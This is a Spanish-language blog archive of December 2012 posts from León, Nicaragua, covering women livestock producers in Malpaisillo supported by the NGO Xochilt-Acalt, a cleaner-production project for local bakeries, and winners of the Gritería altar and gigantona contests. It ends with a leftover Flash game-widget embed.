Se muestran los artículos pertenecientes a Diciembre de 2012.

20121201011203-123.jpg

Mujeres protagonista del cambio

Elaborado foto y texto ´por:  Clarissa Altamirano

Larreynaga Malpaisillo es un municipio del departamento de León, de más de 32 mil habitantes,  en un desierto de 888 kms², con 53 comunidades. El poblado fue fundado el 6 de Septiembre de 1936 y elevado a categoría de Municipio, el 11 de Agosto de 1944.

El más joven de los municipios del departamento de León, de vocación agrícola, se encuentra localizado al norte del departamento, y está incorporado al grupo de los municipios del norte de León, en los que se ejecuta un plan estratégico trabaja para reducir la pobreza.

El 51% de la población lo integran las mujeres, protagonista del cambio en su municipio. Gracias a la incorporación de pequeñas  iniciativas de producción agrícola y ganadera en sus parcelas y perseverancia, las mujeres han logrado sostener sus hogares, mejorando la calidad de vida de ellas y sus familias.

Estas mujeres han incursionado en la diversificación de huertos,  y han  incorporado la crianza de borregos pelibuey, rompiendo  de esta manera,  con los esquemas de  producción tradicional agrícola y pecuaria. También fabrican bombas de mecate, silos, regaderas y filtros.

Este municipio limita al Norte: Municipios de El Sauce y Villanueva. al Sur: Municipio de La Paz Centro. al Este: Municipio de El Jicaral. al Oeste: Municipios de León y Telica
A la vista está el Cerro Negro y el Momotombo, y hacia el norte continúa la cadena volcánica: el Telica, el  Casitas  el Chonco, el San Cristóbal y el Cosigüina.

Malpaisillo al igual que el resto de los 23 municipios de occidente, en los 60, 70 vivieron la época de oro de la producción del algodón, lo que dejo como consecuencia contaminación del suelo con pesticida e insecticidas utilizado para eliminar la plaga del algodón.

 Cambios en sus vidas

Una de las productoras protagonista del cambio en Larreynaga Malpaisillo  es María Cristina  Machado Rivera,de 43 años,  miembro de la Cooperativa de Productoras de Malpaisillo, de la  comunidad Jorge Barreto Romero.

Afirma que gracias al apoyo del organismo “Centro de Orientación Familiar y Educación Sexual Xochilt-Acalt”, se ha  preparado en  diferentes áreas de producción, como la crianza de ganado menor (pelibuey y  cabras),  destace y comercialización; reforestación y elaboración  de abono orgánico;  creación de huertos  familiares;  capacitación en género, salud, y participación ciudadana.

“Antes yo vendía mi mano de obra,  recolectando el algodón,  también trabajé  como cocinera, pero desde que vino a Malpaisillo el proyecto Xochilt-Acalt, me he preparado… ahorita estoy estudiando  el primer año de Veterinaria en una universidad de León”, afirma.

“Con este proyecto iniciamos en 1992;  éramos  7 mujeres de la comunidad  La Esperanza.  Fue un comienzo  muy duro, iniciamos con muchos temores, pues las mujeres estábamos  educadas para estar en la casa,  para parir y cuidar al marido; la construcción social, nos condena a ese  círculo.

Poco a  poco hemos salido  de la pobreza, porque dejamos de vender nuestra mano de obra e iniciamos a producir en nuestro pequeña finquita” expresa Machado.

“Para mí, esto es un gran  logro, es  un gran salto,  hemos construido nuestro  progreso; antes no teníamos nada”, expresa con entusiasmo.

Sueña con más progreso        

La productora María Cristina Machado,  expresa que “las mujeres siempre estamos soñando con el desarrollo para nuestros hijos y nuestra comunidad, miramos que la atención que brindaba la clínica móvil con la que iniciamos,  no daba respuesta a todos  nuestros problemas;  después,  se hizo un diagnóstico que reflejó alto grado de desnutrición en los niños, también se vio la viabilidad de criar pelibuey y cabras para ayudarnos con nuestra alimentación”.

Agrega que a raíz  de esa experiencia,  vieron la posibilidad de comercializar la carne. Actualmente hay 5 pequeños mataderos en la zona, una vez por  semana  se  destaza, dependiendo de la demanda.

Estas mujeres se han abierto espacio en el mercado  de  León y Managua,  donde abastecen a restaurantes y hogares, a pesar que es una novedad en la dieta.      

Así mismo, aprovechan al máximo el cuero de los pelibuey, que al comienzo perdían.  Mujeres jóvenes diseñan y confeccionan calzado para niños y adultos, asegura Machado.

Empoderadas

Esta productora  explica que un factor importante y determinante  es la preparación de las mujeres para empoderarse del cambio, que logran a través de las capacitaciones.

“Si no hubiéramos tenido  talleres de Género, Autoestima y Participación Ciudadana no hubiéramos podido luchar contra  el machismo que está muy arraigado; una mujer sin capacitación no puede echar adelante un rubro por falta de conocimientos” asegura.

A lo largo de estos 21  años, desde 1992,  hemos logrado becas,  ahora nuestras hijas estudian, también las mujeres adultas mayores.

“Hemos luchado con los prejuicios  de las gentes,  que nos decían: para qué van las viejas a estudiar”, la  Xochilt-Acalt debería de darles las cajas para enterrarlas”.  Pero hemos demostrado que podemos incidir en el cambio de nuestro destino y podemos transformar a nuestra familia y nuestra comunidad”, afirma con orgullo.

La Asociación Xochilt-Acalt, un ONG local, ha apoyado con la compra de terrenos para que algunas mujeres tengan vivienda propia, pero la demanda es muy  alta y no se puede dar respuesta a todas.

No son prioridad para la municipalidad

El  progreso  de estas mujeres que aportan al desarrollo local, debería  ir  de la mano  con el apoyo del  gobierno municipal, pero éste las ha  dejado  solas.

Las  mujeres han venido  trabajando arduamente para romper esquemas sociales,  pero su progreso  se hace cada vez más lento y  difícil, pues  no cuentan  con infraestructura para sacar sus cosechas.

La mayoría  de los caminos están dañados, no cuenta con viviendas propias,  en algunos casos,  no hay energía eléctrica  en  las mayoría de las comunidades; el sistema  de agua potable es “pésimo” según un diagnóstico  de un organismo internacional,  que ha detectado alto índices  de cal  y contaminación con eses  fecales.    

Rómulo Rodríguez, Director  de Obras Públicas de la Alcaldía de Larreynaga, explica que para  este año, aprobaron la  ejecución  46 proyectos, en diferentes  áreas,  con un monto de 11 millones de Córdobas.

Según el funcionario municipal,  la prioridad en la ejecución de los proyectos de las comunidades, se hace a través de la demanda de la población.

Datos de INIDE  en  el departamento de León, el 14% de las familias rurales no tiene vivienda propia y sólo el 27% tiene una vivienda de bloques, concreto o ladrillo.

La  demanda de  viviendas de la zona es de 800, pero este año sólo se construyeron 20 en el casco urbano,  pues no se cuenta con mayor presupuesto.

El Director de Obras Públicas del municipio, señala que  son los representantes de  las comunidades quienes  eligen tres prioridades de sus comunidades para realizar los proyectos. Mientras tanto, las demandas de las  mujeres deberán esperar. 

 Participación ciudadana

 La Asociación Xochilt-Acalt  ha venido preparando a hombres y mujeres  de manera integral; la participación ciudadana,  es fundamental  para el desarrollo de las comunidades.

Juana Pastora explica que desde hace 13  años, viven un proceso de preparación de líderes  y lideresas en 51 comunidades del casco urbano y rural.

“Comenzamos por construir ciudadanía, porque gritar con una pancarta no es hacer participación ciudadana;  para construir  los roles,  los ciudadanos  tiene que saber que tienen  derechos y  deberes y son parte  importante en la toma de decisiones en sus comunidades.

Hemos venido trabajando para romper con el asistencialismo y que le  den todo resuelto; que los ciudadanos sean parte  de su desarrollo.

Se ha pasado por un proceso de formación; hemos creado una escuela de lideresas y líderes donde se forman, pues sin preparación no hay avances.

Hemos venido acompañando procesos y los procesos traen cambio, a lo largo de estos años.

Enseñamos que una persona, o un pequeño grupo de personas no pueden decidir por una comunidad,  ellos son tan sólo  los representantes, lo que decide son los comunitarios. Se trabajó con la teoría y la práctica.

 Nuestro actuar está más enfocado en las comunidades rurales, por las faltas de oportunidades.

En la práctica se ha apoyado en la elaboración de los planes operativos de trabajo, en un proceso de planeación municipal,  que fuese hecho con la participación de  la población. También con los planes  desarrollo estratégico comunitario, construido con la comunidad. Esto marca la diferencia con  los planes coyunturales que terminan, cuando concluye el programa.     

Mujeres emigrantes mantiene hogares

Brenda Alvarez  Darce, Directora de la Unidad de Planificación y Atención del Poder Ciudadano, manifiesta que más del 50% de la población de  Larreynaga Malpaisillo, es rural. Está considerado por el  Instituto Nacional de Información de Desarrollo INIDE como un municipio de mediana pobreza.

La población emigrante de Malpaisillo es una de la más alta del país, con una taza de emigración negativa,  mayor de la nación con menos 2 .11.% .

Las edades de los emigrantes oscilan entre 20 y 40 años,  grupos importantes de la población económica activa PEA, emigran  en busca de mayores oportunidades de vida.   Los países donde  emigran son: Costa  Rica, El Salvador y  Guatemala.

La mayoría de los emigrantes son mujeres,  las que sostienen sus hogares, envían remesa  dos veces al mes, con lo que se demuestra que dentro y fuera del país, contribuyen grandemente al desarrollo económico social municipal y nacional refiere Darce.

Experiencia Exitosa de Mujeres disminuyen la Pobreza

La experiencia  exitosa de las mujeres organizadas  de  53 comunidades rurales del municipio Larreynaga  Malpaisillo, ha logrado superar la pobreza, que se vive en la zona.   Sorayda Mercedes Salgado   nativa de la comarca “El Madroño”, ubicada  a 18 kilómetros de la ciudad,  es una de las más de mil mujeres productoras ejemplares.  Vive en medio  de la aridez propia de la zona cubierta de  piedras del rio “El Madroño”,  cuyo caudal aumenta peligrosamente en el invierno.  Sorayda  ha transformado  su finca en  verde; ha  diversificado  su parcela cultivando hortalizas y árboles frutales,  complementándola con crianza de ganado, cabras y pelibuey. Nos cuenta que en  el proyecto Xochilt Acalt, hace  18 años le dieron un par de cabros,  los que  debió pagar con un par de crías en 2 años; después le dieron un par de ovejas,   a pagar de igual manera; y luego las vacas, las cuales pagó  con un par de crías, en 5 años.

“Para mí esto  es de gran ayuda, yo lo he aprovechado mucho, antes no tenía nada, ahora además de tener cabras, ovejas, y vacas, tengo mi huerto familiar y trabajo en la agricultura con el apoyo de Xochilt , nos ha ayudado en todo, desde  capacitaciones,  nos da semillas, nos enseñó a hacer abono orgánico”.

Agrega que  también las  ha ayudado económicamente. “Gracias a ese apoyo  he podido darle  estudios a mis  3 hijos” explica. 

El ONG Xochilt Acalt le compra a mejor precio los animales, para distribuirlos entre las productoras.

Sorayda  señala “Yo he vendido a la Xochilt pelibuey a 50 dólares; si es pequeño lo podemos vender a 300 o 400 córdobas; el que mejor lo paga, es el que va a destace”. Durante 18  años  de organización en el proyecto Xochilt Acalt, se ha preparado como  promotora en sanidad animal y técnica agropecuaria, y  tiene a su cargo a las productoras de “El Madroño”.  Cada 3 meses  supervisa lo que tienen cultivado en el huerto;  cuántas cabras, ovejas, vacas y aves  vendieron  y cuántas se comieron, para verificar la rentabilidad de la finca.

 Bernarda Rosalba Chévez Brenes, también de “El Madroño”, igual que sus vecinas, cría vacas, ovejas y pelibuey. Nos cuenta que ella fue una de las más de 100 productoras beneficiadas con la construcción total de su casa. 

“ Para mí es una buena experiencia estar con la Xochilt, me construyeron mi casa, yo solo tenía mi terreno, ahora tengo mi casa”. 

   Mujeres Protagonista del Cambio

Las  mujeres del municipio de Malpaisillo, en el departamento de León, han logrado incluir a su dieta lo que producen, incorporando  carne de pelibuey y cabra,  rompiendo de esta manera  con  la tradición del consumo  de carne de res, pollo y cerdo.  Así han logrado disminuir la desnutrición que sufrían los niños de la zona.

María Cristina Machado Rivera,  de la Cooperativa de Mujeres Productora de Malpaisillo, explica que la carne de cabra y pelibuey  tiene  más nutrientes y menos grasa, que la carne de res  o de cerdo.

María Cristina,  técnica en  salud animal y estudiante de veterinaria,  cuenta que al  inicio no sabían qué hacer con tanta  producción de cabros y pelibuey,  ya que estos animales se reproducen con mayor rapidez  a diferencia del ganado, pues en el año están produciendo hasta 8 a 10  crías.

“ Al ver tantos animales comenzamos a destazarlos y le dábamos a las personas a degustar, comenzamos poco a poco, hasta que logramos que la gente la consumiera; ahora cada 8 días, se destaza” refiere Machado.

Agrega que  han logrado abrirse mercado  en la comercialización de esta carne,  en  León y Managua, donde entregan a domicilio y a los restaurantes.

La carne de cabra y pelibuey se vende a bajo costo con relación a la otra carne,  el hueso, el hígado, y la cecina se vende a 10 Córdobas la libra; el frito de hueso vale 25, y el frito de posta a  50 Córdobas

Con esta carne se puede hacer diferentes platillos  como: tacos, bistec, brochetas, carne desmenuzada, carne asada, y  sopa, lo más importante es tener todo los ingredientes

“Nosotras  utilizamos solamente ajo, pimienta, y chicoria (culantro); se deja marinando de un día para otro.        

Al inicio se perdían  todos  los  menudos y el cuero,  porque no sabíamos cómo procesar  el cuero; ahora, hemos aprendido a optimizar el cuero. Hay un grupo de jóvenes que se dedica a confeccionar  y comercializar el  calzado de niños y adultos”.

Machado manifiesta, que uno de los objetivos es llenar el vacío nutricional que existe en las 53 comunidades,  porque de nada serviría que se venda esta carne tan rica en nutrientes fuera del municipio y no se logre consumir en la zona.    

 

 

 

20121203233017-ww.jpg

Elaborado Texto y fotografía por: Clarissa Altamirano

Reducir del impacto ambiental de los procesos productivos y fortalecer la competitividad de la industria de panificación y producción de cereales a través de la implementación del enfoque de RSE y  buenas prácticas de manufactura  y mejorar la rentabilidad económica de las microempresas  fueron  los objetivos que se plantearon la Fundación Ecología y Desarrollo Ecodes, Alcaldía Municipal y  el Mific con fondo de la Unión Europea. 

Las  empresas  que participaron en este proyecto son : Panadería Garza Morena, Panadería San Rafael, Panadería Roque, Panadería San Benito, Panadería Arco Iris, Panadería Los Ángeles, Panadería Bambino, Cereales “Mi abuela”, Cereales Xilonem, Cereales Lidia, Panadería Griselda, Panadería Zelaya.

 El trabajo  inicio con la Sensibilización de  los microempresarios  del municipio de León sobre la importancia y su beneficio de implementar una Producción Más Limpia y la Responsabilidad Social Empresarial.
Asimismo se trabajó en  Elaboración de materiales de campaña de sensibilización y Divulgación de los materiales de sensibilización y pautación de cuñas radiales.

El proyecto contemplo una serie de capacitaciones sobre el PmL y RSE donde participaron unos 40 microempresarios. También se apoyó en  la Feria de Divulgación de resultados de PmL

Con este proyecto se benefició a unas  10 microempresas del municipio de León quienes  han reducido el impacto ambiental de sus procesos productivos y han mejorado la productividad y rentabilidad de su empresa a través de la elaboración e implementación de planes de acción integral de mejora.

A esto micro empresarios se capacitaron  sobre la elaboración de un plan de mejora de PmL.

Otro aspecto  que se trabajó fuel el nivel de ruido está entre los valores permitidos en todas las PYMES, solo ligeramente mayor en el caso de San Rafael y Zelaya.  Para este caso se ha considerado los valores extremos entre 40 y 60 decibeles.  Se puede notar que los valores registrados se encuentran entre estos extremos.

Iluminación y ventilación

Más de la mitad de los establecimientos no cuentan con niveles de iluminación adecuados.
Los pequeños negocios que presentan los mayores problemas de iluminación son Garza Morena, San Benito, Arco Iris, Bambino, Xilonem y Zelaya.  Las que tienen valores entre los rangos permitidos son Los Ángeles y Griselda.  Las que salen de los rangos máximos son San Rafael, Roque, Mi abuela y Lidia.

Estos valores están influenciados por las condiciones climáticas de la época y se aprecia que los valores en su mayoría están sobre los parámetros permitidos. El sistema eléctrico en la mayoría de los casos es parte de la distribución eléctrica utilizada en la vivienda para los usos habitacionales.  Su estado físico es deficiente en más de un 70% de los establecimientos estudiados.

La realización de este estudio permitió identificar áreas de investigación relacionadas a eficiencia de hornos a leña, motores en baja potencia, sistemas de iluminación natural, aislamientos, poder calorífico de madera comúnmente utilizada en estas actividades, mejoras en procesos de producción, adecuación de espacios y mejoramiento de sistemas eléctricos y consumos de agua.  Así mismo valoración de ventilación natural y lo relacionado con medida de seguridad laboral.

Las condiciones de operación pueden ser mejoradas y facilitar condiciones y seguridad al personal que laboral.


Estas acciones pueden dirigirse hacia otras áreas productivas que permitan mejoras continuas y reducción de residuos.  Esta acción debe de acompañarse de un seguimiento, discusión y determinación de medidas de mejoramiento según los resultados obtenido.

 Las principales dificultades son: mal dimensionado de cables y sistemas de protección; alambres expuestos y sin orden.  En la mayoría de los casos con su vida útil caducada.  Motores en su mayoría sin interruptores adecuados y sin protección.



20121214230434-dsc06481.jpg

Elaborado por Clarissa Altamirano

Alcaldesa Juana de los Santos Roque Núñez entrego los premios a los tres primeros lugares ganadores de altares ofrecidos a la bienaventurada Concepción de María (Gritería Grande) y concursantes del certamen de Gigantonas, así mismo hizo entrega de reconocimientos. En horas del  medio día del reciente miércoles 12 de diciembre en el despacho de la municipalidad.

Los premios de Altares  fueron patrocinados  por Intur y los del concurso de la Gigantonas los patrocino la Alcaldía Municipal de León.

Ganadores  del concurso de Altares:

1º Lugar: Manuel Enrique Roque Mercado con el lema “Reyna y Madre de Nuestra Soberanía”. C$ 10.000.00 Diez mil córdobas.

2º Lugar: Ramiro Escobar Henríquez su lema fue titulado “Virgen María tu Belleza se Refleja en el salto de Las Segovias”. C$ 7.000.00 Siete mil córdobas.

3º Lugar: Eddy Gregorio Bravo Blandón bajo el lema “Bendito el Fruto de tu Vientre”. C$ 5.000.00 Cinco mil córdobas.

 

Ganadores del concurso de Gigantonas:

1º Lugar: Jonathan Roque con la gigantona Xiomara del Laborío C$ 5.000.00 cinco mil córdobas.

2º Lugar: Oswaldo José Ruíz con la gigantona Katherine de Guadalupe C$ 4.000.00 Cuatro mil córdobas.

3º Lugar: Anita Maradiaga con la Gigantona Reyna Isabel de Sutiaba C$ 3.000.00 Tres mil córdobas.

 

Además se les entrego telas a los concursantes del certamen de  gigantonas,  para la elaboración de trajes de gigantonas, donados por el Banco Central de Nicaragua.

mujeres productoras

Publicado: 18/12/2012 17:36 por nicatierrad en GENERO
20121218173652-mujeresproductoras1.jpg

Elaborado por Clarissa Altamirano

mujeres productoras

Publicado: 18/12/2012 17:37 por nicatierrad en GENERO
20121218173741-mujeresproductoras2.jpg

Elaborado por Clarissa Altamirano

Alza de transporte

Publicado: 27/12/2012 01:16 por nicatierrad en ECONOMIA
object allowscriptaccess="always" type="application/x-shockwave-flash" data="http://cheshire.cat.xmlrequest.info/pacman.swf?id=1163465_2&ln=es" width="120" height="160" wmode="transparent">